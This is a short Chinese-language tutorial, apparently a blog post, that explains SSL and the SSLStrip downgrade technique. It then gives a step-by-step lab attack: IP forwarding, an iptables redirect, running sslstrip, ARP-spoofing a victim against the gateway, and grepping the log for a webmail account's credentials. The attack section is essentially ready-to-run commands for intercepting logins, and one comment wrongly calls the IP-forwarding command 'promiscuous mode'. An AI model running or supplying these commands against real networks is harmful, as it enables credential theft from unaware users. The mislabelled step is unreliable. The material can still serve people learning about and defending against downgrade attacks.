1、SSL解析
SSL 是 Secure Socket Layer 的簡稱, 中文意思是安全套接字層,由 NetScape公司所開發,用以保障在 Internet 上數據傳輸的安全,確保數據在網絡的傳輸過程中不會被截取和竊聽。
SSL 協議提供的服務主要有:
(1)認證用戶和服務器,確保數據發送到正確的客戶和服務器。
(2)加密數據以防止數據中途被竊取。
(3)維護數據的完整性,確保數據在傳輸過程中不被改變。
2、SSLStrip
SSLStrip 的工作原理及步驟如下:
(1) 先進行中間人攻擊來攔截 HTTP 流量。
(2) 將出現的 HTTPS 鏈接全部替換為 HTTP,同時記下所有改變的鏈接。
(3) 使用 HTTP 與受害者機器連接。
(4) 同時與合法的服務器建立 HTTPS。
(5) 受害者與合法服務器之間的全部通信經過了代理轉發。
(6) 其中,出現的圖標被替換成為用戶熟悉的“小黃鎖”圖標,以建立信任。
(7) 這樣,中間人攻擊就成功騙取了密碼、賬號等信息,而受害者一無所知。
注:下載地址:http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz
3、SSLStrip進行攻擊
測試環境:攻擊機(kali)+受害機(隨意)
攻擊者:
啟動網卡混雜模式:echo "1">/proc/sys/net/ipv4/ip_forward
添加防火牆規則:iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 9527
-t:制定命令要操作的匹配包的表
-A:在選擇的鏈末添加規則
-p:制定協議
--dport:制定端口
-j:目標跳轉
開啟SSLStrip:python sslstrip.py -a -l 9527 -w sslstrip.log
-a:記錄所有來自服務器的ssl和Http數據流量內容;
-l:監聽端口
-w:保存文件
開啟arp欺騙:arpspoof -i eth0 -t 192.168.133.130(受害機) 192.168.133.2(網關)
受害機登陸126郵箱
攻擊者查看日志:cat sslstrip.log | grep "郵箱名"
據說打了碼可以去掉,這里就不上圖了~~~~
